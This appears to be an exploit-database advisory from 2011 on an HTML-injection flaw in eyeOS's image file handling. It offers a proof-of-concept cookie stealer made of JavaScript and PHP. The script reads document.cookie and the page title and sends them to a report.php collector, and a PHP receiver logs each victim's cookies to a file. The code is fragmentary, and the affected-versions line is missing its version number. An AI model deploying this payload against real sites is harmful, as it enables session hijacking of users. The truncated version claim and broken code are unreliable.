eyeOS – Image File Handling HTML Injection

  • 作者: Alberto Ortega
    日期: 2011-04-25
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/35677/
  • source: https://www.securityfocus.com/bid/47629/info
    eyeOS is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input passed through image content before using it in dynamically generated content.
    Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
    Versions prior to eyeOS are vulnerable. 
    <!doctype html>
    var http = new XMLHttpRequest()
    var url = "http://localhost/report.php?" + "user=" + top.document.title + "&cookie=" + document.cookie;
    http.open("GET", url, true);
    $usercookies = fopen("usercookies", "a");
    fwrite($usercookies, "User: " . $_GET['user'] . "\t" ."Cookie: " . $_GET['cookie'] . "\n");